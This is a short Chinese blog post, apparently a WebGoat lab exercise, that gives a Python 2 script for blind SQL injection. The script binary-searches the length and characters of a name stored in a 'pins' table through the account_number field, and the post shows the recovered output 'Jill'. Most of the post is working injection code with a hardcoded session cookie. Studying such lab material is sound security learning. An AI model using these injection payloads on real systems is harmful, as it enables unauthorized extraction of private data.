本文介绍了一个使用Python进行SQL注入攻击的实例。通过构造特定的SQL查询字符串并利用Python的网络请求库,实现了对目标网站的有效攻击,成功获取了指定的数据。
这个 task 如果用手工尝试的话, 还是比较麻烦的. 决定用编程解决.
Python处理任务相关的问题比较方便, 花时间入门了下 python, 然后开始写代码, 很简单的原理.
在这期间发现简单的算法都不熟了, 汗.
以下是代码
#!/usr/bin/python
#author: dengzhaoqun
#date: 2013-03-08
#email: dengzhaoqun@163.com
import urllib
import urllib2
import sys
url= 'http://localhost/WebGoat/attack?Screen=3433&menu=1100'
account = 101
result = '<p>Account number is valid</form></div>'
def isValid(str):
params = urllib.urlencode({'account_number': str, 'SUBMIT':'Go!'})
req = urllib2.Request(url, params, {'Cookie':'JSESSIONID=8FFA3190C91029D2BB486DEBE4D037B0'})
f = urllib2.urlopen(req)
content = f.read()
ret = content.find(result)
if(ret == -1):
return False
return True
#get name len
lenMax = 100
lenMin = 1
while(lenMax > lenMin):
#print lenMax, lenMin
len = (lenMax + lenMin) / 2
str = "%d and ((LENGTH(select name from pins where cc_number = '4321432143214321')) <= %d)" %(account, len)
#print str
valid = isValid(str)
if( not valid):
lenMin = len + 1
else:
lenMax = len
print "--- name len: %d ---" %lenMax
# get name
name = ''
for i in range(1, lenMax + 1):
charMax = 122 # 'z'
charMin = 65 # 'A'
while(charMax > charMin):
#print chr(charMax), chr(charMin)
char = (charMax + charMin) / 2
str = "%d and ((SUBSTRING((select name from pins where cc_number = '4321432143214321'), %d, 1)) <= '%s')" %(account, i, chr(char))
#print str
valid = isValid(str)
if( not valid):
charMin = char + 1
else:
charMax = char
name += chr(charMax)
print '--- name: %s ---' % name
--- name len: 4 ---
--- name: Jill ---
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
